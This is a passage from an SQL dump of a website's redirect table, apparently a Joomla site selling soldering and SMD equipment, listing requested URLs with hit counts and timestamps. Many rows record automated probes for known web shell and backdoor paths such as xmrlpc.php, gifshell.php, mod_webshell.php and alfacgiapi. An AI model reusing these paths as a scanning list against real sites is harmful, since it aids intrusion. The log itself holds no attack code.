00:00:00',301),(37736,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku',NULL,'','',17,0,'2025-03-04 12:10:14','0000-00-00 00:00:00',301),(37737,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',14,0,'2025-03-04 12:10:15','0000-00-00 00:00:00',301),(37738,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name',NULL,'','',15,0,'2025-03-04 12:10:17','0000-00-00 00:00:00',301),(37739,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',15,0,'2025-03-04 12:10:18','0000-00-00 00:00:00',301),(37740,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,category_name',NULL,'','',14,0,'2025-03-04 12:10:20','0000-00-00 00:00:00',301),(37741,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name',NULL,'','',21,0,'2025-03-04 12:10:23','0000-00-00 00:00:00',301),(37742,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,mf_name/dirdesc',NULL,'','',21,0,'2025-03-04 12:10:24','0000-00-00 00:00:00',301),(37743,'https://3s-technologies.com.tr/index.php/tr/ueruenler/bölgesel-lehimleme/by,product_sku',NULL,'','',18,0,'2025-03-04 12:10:26','0000-00-00 00:00:00',301),(37744,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',27,0,'2025-03-04 12:10:29','0000-00-00 00:00:00',301),(37745,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',14,0,'2025-03-04 12:10:31','0000-00-00 00:00:00',301),(37746,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın',NULL,'','',23,0,'2025-03-04 12:10:33','0000-00-00 00:00:00',301),(37747,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,`p`.product_sku',NULL,'','',26,0,'2025-03-04 12:10:34','0000-00-00 00:00:00',301),(37748,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,category_name/dirdesc',NULL,'','',24,0,'2025-03-04 12:10:35','0000-00-00 00:00:00',301),(37749,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,mf_name/dirdesc?language=tr-tr',NULL,'','',1,0,'2025-03-04 12:10:36','0000-00-00 00:00:00',301),(37750,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/by,product_sku?language=tr-tr',NULL,'','',1,0,'2025-03-04 12:10:37','0000-00-00 00:00:00',301),(37751,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',22,0,'2025-03-04 12:10:38','0000-00-00 00:00:00',301),(37752,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',24,0,'2025-03-04 12:10:40','0000-00-00 00:00:00',301),(37753,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,category_name/dirdesc',NULL,'','',20,0,'2025-03-04 12:10:41','0000-00-00 00:00:00',301),(37754,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name',NULL,'','',24,0,'2025-03-04 12:10:44','0000-00-00 00:00:00',301),(37755,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,mf_name/dirdesc',NULL,'','',24,0,'2025-03-04 12:10:45','0000-00-00 00:00:00',301),(37756,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',25,0,'2025-03-04 12:10:47','0000-00-00 00:00:00',301),(37757,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',22,0,'2025-03-04 12:10:49','0000-00-00 00:00:00',301),(37758,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız',NULL,'','',19,0,'2025-03-04 12:10:52','0000-00-00 00:00:00',301),(37759,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku',NULL,'','',20,0,'2025-03-04 12:10:53','0000-00-00 00:00:00',301),(37760,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/dirdesc',NULL,'','',20,0,'2025-03-04 12:10:54','0000-00-00 00:00:00',301),(37761,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',21,0,'2025-03-04 12:10:57','0000-00-00 00:00:00',301),(37762,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,category_name/dirdesc',NULL,'','',22,0,'2025-03-04 12:10:58','0000-00-00 00:00:00',301),(37763,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,mf_name/dirdesc',NULL,'','',21,0,'2025-03-04 12:11:01','0000-00-00 00:00:00',301),(37764,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',17,0,'2025-03-04 12:11:04','0000-00-00 00:00:00',301),(37765,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',18,0,'2025-03-04 12:11:05','0000-00-00 00:00:00',301),(37766,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,ordering',NULL,'','',22,0,'2025-03-04 12:11:07','0000-00-00 00:00:00',301),(37767,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name',NULL,'','',21,0,'2025-03-04 12:11:08','0000-00-00 00:00:00',301),(37768,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-orta-hızlı/by,product_name/dirdesc',NULL,'','',23,0,'2025-03-04 12:11:09','0000-00-00 00:00:00',301),(37769,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',18,0,'2025-03-04 12:11:11','0000-00-00 00:00:00',301),(37770,'https://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',18,0,'2025-03-04 12:11:13','0000-00-00 00:00:00',301),(37771,'https://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',10,0,'2025-03-04 12:40:49','0000-00-00 00:00:00',301),(37772,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name',NULL,'','',19,0,'2025-03-04 12:41:08','0000-00-00 00:00:00',301),(37773,'https://3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name/dirdesc',NULL,'','',14,0,'2025-03-04 12:41:09','0000-00-00 00:00:00',301),(37774,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_name/dirdesc',NULL,'','',26,0,'2025-03-04 12:41:20','0000-00-00 00:00:00',301),(37775,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',27,0,'2025-03-04 12:41:23','0000-00-00 00:00:00',301),(37776,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/dirdesc',NULL,'','',28,0,'2025-03-04 12:41:25','0000-00-00 00:00:00',301),(37777,'https://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',13,0,'2025-03-04 12:41:28','0000-00-00 00:00:00',301),(37778,'http://www.3s-technologies.com.tr/tr/include/ckeditor/plugins/smiley/images/angel_smile.gif',NULL,'','',1,0,'2025-03-04 13:18:12','0000-00-00 00:00:00',301),(37779,'http://www.3s-technologies.com.tr/tr/static/images/nopic.png',NULL,'','',2,0,'2025-03-04 13:18:47','0000-00-00 00:00:00',301),(37780,'http://www.3s-technologies.com.tr/tr/static/common/user/uedit/php/controller.php?action=catchimage',NULL,'','',1,0,'2025-03-04 13:42:24','0000-00-00 00:00:00',301),(37781,'https://www.3s-technologies.com.tr/tr/static/images/nopic.png',NULL,'','',2,0,'2025-03-04 13:44:47','0000-00-00 00:00:00',301),(37782,'https://www.3s-technologies.com.tr/tr/e/data/js/ajax.js',NULL,'','',1,0,'2025-03-04 14:38:42','0000-00-00 00:00:00',301),(37783,'https://3s-technologies.com.tr/tr/wp-content/plugins/security-malware-firewall/readme.txt',NULL,'','',1,0,'2025-03-05 05:45:31','0000-00-00 00:00:00',301),(37784,'http://3s-technologies.com.tr/tr/wordpress.zip',NULL,'','',4,0,'2025-03-07 10:04:10','0000-00-00 00:00:00',301),(37785,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name',NULL,'','',14,0,'2025-03-07 13:53:00','0000-00-00 00:00:00',301),(37786,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,mf_name/dirdesc',NULL,'','',14,0,'2025-03-07 13:53:01','0000-00-00 00:00:00',301),(37787,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,ordering',NULL,'','',13,0,'2025-03-07 13:53:04','0000-00-00 00:00:00',301),(37788,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name',NULL,'','',9,0,'2025-03-07 13:53:06','0000-00-00 00:00:00',301),(37789,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_name/dirdesc',NULL,'','',10,0,'2025-03-07 13:53:07','0000-00-00 00:00:00',301),(37790,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/by,product_sku',NULL,'','',11,0,'2025-03-07 13:53:09','0000-00-00 00:00:00',301),(37791,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',6,0,'2025-03-07 13:53:12','0000-00-00 00:00:00',301),(37792,'https://3s-technologies.com.tr/index.php/tr/ueruenler/çubuk-lehim/e-bar-detail/askquestion?tmpl=component',NULL,'','',8,0,'2025-03-07 13:53:14','0000-00-00 00:00:00',301),(37793,'http://3s-technologies.com.tr/tr/this_shit_is_fake.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:37:18','0000-00-00 00:00:00',301),(37794,'http://3s-technologies.com.tr/tr/wp-admin/function.php',NULL,'http://google.com/','',57,0,'2025-03-08 15:37:34','0000-00-00 00:00:00',301),(37795,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise/wp-crons.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:37:37','0000-00-00 00:00:00',301),(37796,'http://3s-technologies.com.tr/tr/wp-includes/defaults.php',NULL,'http://google.com/','',5,0,'2025-03-08 15:37:42','0000-00-00 00:00:00',301),(37797,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/wp-crons.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:37:56','0000-00-00 00:00:00',301),(37798,'http://3s-technologies.com.tr/tr/wp-admin/images/plugins.php',NULL,'http://google.com/','',9,0,'2025-03-08 15:37:59','0000-00-00 00:00:00',301),(37799,'http://3s-technologies.com.tr/tr/bypassbest.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:38:01','0000-00-00 00:00:00',301),(37800,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:38:04','0000-00-00 00:00:00',301),(37801,'http://3s-technologies.com.tr/tr/checkbox.php',NULL,'http://google.com/','',12,0,'2025-03-08 15:38:28','0000-00-00 00:00:00',301),(37802,'http://3s-technologies.com.tr/tr/cgi-bin/xmrlpc.php',NULL,'http://google.com/','',49,0,'2025-03-08 15:38:36','0000-00-00 00:00:00',301),(37803,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/parse/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:38:39','0000-00-00 00:00:00',301),(37804,'http://3s-technologies.com.tr/tr/wp-admin/0x1.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:38:41','0000-00-00 00:00:00',301),(37805,'http://3s-technologies.com.tr/tr/wp-includes/pomo/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:38:49','0000-00-00 00:00:00',301),(37806,'http://3s-technologies.com.tr/tr/wp-content/x/index.php',NULL,'http://google.com/','',61,0,'2025-03-08 15:38:51','0000-00-00 00:00:00',301),(37807,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/jsdindex.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:38:54','0000-00-00 00:00:00',301),(37808,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/light/wp-load.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:39:21','0000-00-00 00:00:00',301),(37809,'http://3s-technologies.com.tr/tr/locale.php',NULL,'http://google.com/','',11,0,'2025-03-08 15:39:26','0000-00-00 00:00:00',301),(37810,'http://3s-technologies.com.tr/tr/wp-admin/includes/wp-login.php',NULL,'http://google.com/','',38,0,'2025-03-08 15:39:37','0000-00-00 00:00:00',301),(37811,'http://3s-technologies.com.tr/tr/wp-content/uploads/ty.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:39:43','0000-00-00 00:00:00',301),(37812,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor/includes/elements/index.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:39:52','0000-00-00 00:00:00',301),(37813,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/wcg9lbohd14.php?action=768776e296b6f286f2a72607e276b62666c6d286',NULL,'http://google.com/','',2,0,'2025-03-08 15:39:55','0000-00-00 00:00:00',301),(37814,'http://3s-technologies.com.tr/tr/wp-admin/network/xmrlpc.php',NULL,'http://google.com/','',45,0,'2025-03-08 15:40:00','0000-00-00 00:00:00',301),(37815,'http://3s-technologies.com.tr/tr/wp-admin/autoload_classmap.php',NULL,'http://google.com/','',98,0,'2025-03-08 15:40:07','0000-00-00 00:00:00',301),(37816,'http://3s-technologies.com.tr/tr/wp-content/ty.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:40:17','0000-00-00 00:00:00',301),(37817,'http://3s-technologies.com.tr/tr/jga.php',NULL,'http://google.com/','',103,0,'2025-03-08 15:40:31','0000-00-00 00:00:00',301),(37818,'http://3s-technologies.com.tr/tr/wp-content/bypassbest.php',NULL,'http://google.com/','',25,0,'2025-03-08 15:40:45','0000-00-00 00:00:00',301),(37819,'http://3s-technologies.com.tr/tr/cgi-bin/moon.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:40:47','0000-00-00 00:00:00',301),(37820,'http://3s-technologies.com.tr/tr/wp-includes/block-patterns/themes.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:40:56','0000-00-00 00:00:00',301),(37821,'http://3s-technologies.com.tr/tr/wp-content/plugins/cyr2lat/lib/index.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:40:58','0000-00-00 00:00:00',301),(37822,'http://3s-technologies.com.tr/tr/wp-includes/widgets/wp-login.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:41:03','0000-00-00 00:00:00',301),(37823,'http://3s-technologies.com.tr/tr/wp-admin/images/xmrlpc.php',NULL,'http://google.com/','',47,0,'2025-03-08 15:41:09','0000-00-00 00:00:00',301),(37824,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:11','0000-00-00 00:00:00',301),(37825,'http://3s-technologies.com.tr/tr/wp-content/j.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:27','0000-00-00 00:00:00',301),(37826,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:30','0000-00-00 00:00:00',301),(37827,'http://3s-technologies.com.tr/tr/wp-includes/css/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:40','0000-00-00 00:00:00',301),(37828,'http://3s-technologies.com.tr/tr/wp-admin/index.php',NULL,'http://google.com/','',120,0,'2025-03-08 15:41:46','0000-00-00 00:00:00',301),(37829,'http://3s-technologies.com.tr/tr/wp-admin/maint/wp-login.php',NULL,'http://google.com/','',38,0,'2025-03-08 15:41:51','0000-00-00 00:00:00',301),(37830,'http://3s-technologies.com.tr/tr/wp-content/license.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:54','0000-00-00 00:00:00',301),(37831,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/wp-admin.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:41:57','0000-00-00 00:00:00',301),(37832,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-file-manager/file_folder_manager.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:42:20','0000-00-00 00:00:00',301),(37833,'http://3s-technologies.com.tr/tr/rx.php',NULL,'http://google.com/','',5,0,'2025-03-08 15:42:22','0000-00-00 00:00:00',301),(37834,'http://3s-technologies.com.tr/tr/wp-includes/text/diff/about.php',NULL,'http://google.com/','',43,0,'2025-03-08 15:42:25','0000-00-00 00:00:00',301),(37835,'http://3s-technologies.com.tr/tr/wp-includes/pomo/newup.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:42:36','0000-00-00 00:00:00',301),(37836,'http://3s-technologies.com.tr/tr/wp-content/packed.php',NULL,'http://google.com/','',92,0,'2025-03-08 15:42:39','0000-00-00 00:00:00',301),(37837,'http://3s-technologies.com.tr/tr/.tmb/moon.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:42:45','0000-00-00 00:00:00',301),(37838,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/xmrlpc.php',NULL,'http://google.com/','',87,0,'2025-03-08 15:42:50','0000-00-00 00:00:00',301),(37839,'http://3s-technologies.com.tr/tr/ioxi-rex3.php7',NULL,'http://google.com/','',1,0,'2025-03-08 15:42:53','0000-00-00 00:00:00',301),(37840,'http://3s-technologies.com.tr/tr/wp-content/plugins/vs-admin-media/about.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:43:01','0000-00-00 00:00:00',301),(37841,'http://3s-technologies.com.tr/tr/wp-includes/widgets/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:43:04','0000-00-00 00:00:00',301),(37842,'http://3s-technologies.com.tr/tr/wp-admin/images/moon.php',NULL,'http://google.com/','',51,0,'2025-03-08 15:43:07','0000-00-00 00:00:00',301),(37843,'http://3s-technologies.com.tr/tr/.well-known/themes.php',NULL,'http://google.com/','',21,0,'2025-03-08 15:43:15','0000-00-00 00:00:00',301),(37844,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/ocean/admin.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:43:17','0000-00-00 00:00:00',301),(37845,'http://3s-technologies.com.tr/tr/luuf.php',NULL,'http://google.com/','',5,0,'2025-03-08 15:43:20','0000-00-00 00:00:00',301),(37846,'http://3s-technologies.com.tr/tr/wp-includes/dropdown.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:43:25','0000-00-00 00:00:00',301),(37847,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/wp-login.php',NULL,'http://google.com/','',8,0,'2025-03-08 15:43:33','0000-00-00 00:00:00',301),(37848,'http://3s-technologies.com.tr/tr/admin/controller/extension/extension/dadtlv3ypn6.php?action=768776e296b6f286f2a72607e276b62666c6d286',NULL,'http://google.com/','',2,0,'2025-03-08 15:43:38','0000-00-00 00:00:00',301),(37849,'http://3s-technologies.com.tr/tr/wp-admin/includes/themes.php',NULL,'http://google.com/','',8,0,'2025-03-08 15:43:44','0000-00-00 00:00:00',301),(37850,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/text.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:44:00','0000-00-00 00:00:00',301),(37851,'http://3s-technologies.com.tr/tr/sites/all/themes/adminimal_theme/uqpfx5tizby.php?action=768776e296b6f286f2a72607e276b62666c6d286',NULL,'http://google.com/','',1,0,'2025-03-08 15:44:03','0000-00-00 00:00:00',301),(37852,'http://3s-technologies.com.tr/tr/wp-includes/classwithtostring.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:44:20','0000-00-00 00:00:00',301),(37853,'http://3s-technologies.com.tr/tr/ioxi-rex.php',NULL,'http://google.com/','',4,0,'2025-03-08 15:44:23','0000-00-00 00:00:00',301),(37854,'http://3s-technologies.com.tr/tr/wp-content/plugins/moon.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:44:25','0000-00-00 00:00:00',301),(37855,'http://3s-technologies.com.tr/tr/wp-admin/includes/xmrlpc.php',NULL,'http://google.com/','',151,0,'2025-03-08 15:44:28','0000-00-00 00:00:00',301),(37856,'http://3s-technologies.com.tr/tr/wp-content/themes/wp-login.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:44:46','0000-00-00 00:00:00',301),(37857,'http://3s-technologies.com.tr/tr/wp-content/gifshell.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:44:49','0000-00-00 00:00:00',301),(37858,'http://3s-technologies.com.tr/tr/modules/mod_webshell/mod_webshell.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:44:56','0000-00-00 00:00:00',301),(37859,'http://3s-technologies.com.tr/tr/wp-includes/text/index.php',NULL,'http://google.com/','',70,0,'2025-03-08 15:45:08','0000-00-00 00:00:00',301),(37860,'http://3s-technologies.com.tr/tr/wp-includes/requests/text/footer.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:45:24','0000-00-00 00:00:00',301),(37861,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/xmrlpc.php',NULL,'http://google.com/','',66,0,'2025-03-08 15:45:27','0000-00-00 00:00:00',301),(37862,'http://3s-technologies.com.tr/tr/wp-includes/autoload_classmap.php',NULL,'http://google.com/','',139,0,'2025-03-08 15:45:37','0000-00-00 00:00:00',301),(37863,'http://3s-technologies.com.tr/tr/wp-includes/requests/plugins.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:45:39','0000-00-00 00:00:00',301),(37864,'http://3s-technologies.com.tr/tr/css/bak.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:45:45','0000-00-00 00:00:00',301),(37865,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/parts/about.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:45:50','0000-00-00 00:00:00',301),(37866,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/about.php',NULL,'http://google.com/','',26,0,'2025-03-08 15:45:55','0000-00-00 00:00:00',301),(37867,'http://3s-technologies.com.tr/tr/wp-admin/product.php',NULL,'http://google.com/','',13,0,'2025-03-08 15:45:57','0000-00-00 00:00:00',301),(37868,'http://3s-technologies.com.tr/tr/wp-content/themes/about.php7',NULL,'http://google.com/','',2,0,'2025-03-08 15:46:06','0000-00-00 00:00:00',301),(37869,'http://3s-technologies.com.tr/tr/wp-includes/sodium_compat/src/core32/curve25519/ge/wp_cron.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:11','0000-00-00 00:00:00',301),(37870,'http://3s-technologies.com.tr/tr/wp-admin/images/revision.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:28','0000-00-00 00:00:00',301),(37871,'http://3s-technologies.com.tr/tr/wp-includes/blocks/post-title/index.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:36','0000-00-00 00:00:00',301),(37872,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-login.php',NULL,'http://google.com/','',68,0,'2025-03-08 15:46:38','0000-00-00 00:00:00',301),(37873,'http://3s-technologies.com.tr/tr/ioxi-rex5.php7',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:46','0000-00-00 00:00:00',301),(37874,'http://3s-technologies.com.tr/tr/wp-includes/id3/vp.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:49','0000-00-00 00:00:00',301),(37875,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/moon.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:46:52','0000-00-00 00:00:00',301),(37876,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/providers/index.php',NULL,'http://google.com/','',28,0,'2025-03-08 15:47:00','0000-00-00 00:00:00',301),(37877,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/index.php?bx=bx=0e215962017',NULL,'http://google.com/','',1,0,'2025-03-08 15:47:08','0000-00-00 00:00:00',301),(37878,'http://3s-technologies.com.tr/tr/theme-inshpvx.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:47:10','0000-00-00 00:00:00',301),(37879,'http://3s-technologies.com.tr/tr/wp-content/themes/twentytwentytwo/parts/about.php7',NULL,'http://google.com/','',1,0,'2025-03-08 15:47:21','0000-00-00 00:00:00',301),(37880,'http://3s-technologies.com.tr/tr/wp-content/plugins/elementor-pro/modules/gallery/assets/index.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:47:43','0000-00-00 00:00:00',301),(37881,'http://3s-technologies.com.tr/tr/wp-includes/certificates/wp-login.php',NULL,'http://google.com/','',42,0,'2025-03-08 15:47:49','0000-00-00 00:00:00',301),(37882,'http://3s-technologies.com.tr/tr/wp-admin/user/xmrlpc.php',NULL,'http://google.com/','',66,0,'2025-03-08 15:47:51','0000-00-00 00:00:00',301),(37883,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:48:01','0000-00-00 00:00:00',301),(37884,'http://3s-technologies.com.tr/tr/wp-content/themes/themes.php',NULL,'http://google.com/','',15,0,'2025-03-08 15:48:12','0000-00-00 00:00:00',301),(37885,'http://3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/filemanager.php',NULL,'http://google.com/','',95,0,'2025-03-08 15:48:17','0000-00-00 00:00:00',301),(37886,'http://3s-technologies.com.tr/tr/images/wp-login.php',NULL,'http://google.com/','',3,0,'2025-03-08 15:48:20','0000-00-00 00:00:00',301),(37887,'http://3s-technologies.com.tr/tr/wp-includes/style-engine/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:48:31','0000-00-00 00:00:00',301),(37888,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/wp-login.php',NULL,'http://google.com/','',80,0,'2025-03-08 15:48:34','0000-00-00 00:00:00',301),(37889,'http://3s-technologies.com.tr/tr/product.php',NULL,'http://google.com/','',8,0,'2025-03-08 15:48:39','0000-00-00 00:00:00',301),(37890,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/about.php',NULL,'http://google.com/','',12,0,'2025-03-08 15:48:48','0000-00-00 00:00:00',301),(37891,'http://3s-technologies.com.tr/tr/wp-admin/xmrlpc.php',NULL,'http://google.com/','',36,0,'2025-03-08 15:48:55','0000-00-00 00:00:00',301),(37892,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-signup.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:49:03','0000-00-00 00:00:00',301),(37893,'http://3s-technologies.com.tr/tr/wp-includes/index.php',NULL,'http://google.com/','',124,0,'2025-03-08 15:49:17','0000-00-00 00:00:00',301),(37894,'http://3s-technologies.com.tr/tr/wp-includes/fonts/themes.php',NULL,'http://google.com/','',23,0,'2025-03-08 15:49:27','0000-00-00 00:00:00',301),(37895,'http://3s-technologies.com.tr/tr/gifshell.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:49:33','0000-00-00 00:00:00',301),(37896,'http://3s-technologies.com.tr/tr/packed.php',NULL,'http://google.com/','',84,0,'2025-03-08 15:49:35','0000-00-00 00:00:00',301),(37897,'http://3s-technologies.com.tr/tr/wp-content/cache/index.php',NULL,'http://google.com/','',61,0,'2025-03-08 15:49:40','0000-00-00 00:00:00',301),(37898,'http://3s-technologies.com.tr/tr/wp-includes/fonts/plugins.php',NULL,'http://google.com/','',6,0,'2025-03-08 15:49:47','0000-00-00 00:00:00',301),(37899,'http://3s-technologies.com.tr/tr/wp-includes/customize/wp-login.php',NULL,'http://google.com/','',36,0,'2025-03-08 15:49:50','0000-00-00 00:00:00',301),(37900,'http://3s-technologies.com.tr/tr/wp-includes/requests/text/radio.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:49:55','0000-00-00 00:00:00',301),(37901,'http://3s-technologies.com.tr/tr/wp-admin/maint/themes.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:50:13','0000-00-00 00:00:00',301),(37902,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-email-log/include/core/uc.php',NULL,'http://google.com/','',1,0,'2025-03-08 15:50:24','0000-00-00 00:00:00',301),(37903,'http://3s-technologies.com.tr/tr/wp-admin/defaults.php',NULL,'http://google.com/','',2,0,'2025-03-08 15:50:32','0000-00-00 00:00:00',301),(37904,'http://3s-technologies.com.tr/tr/wp-content/autoload_classmap.php',NULL,'http://google.com/','',112,0,'2025-03-08 15:50:40','0000-00-00 00:00:00',301),(37905,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/wp-login.php',NULL,'http://google.com/','',8,0,'2025-03-08 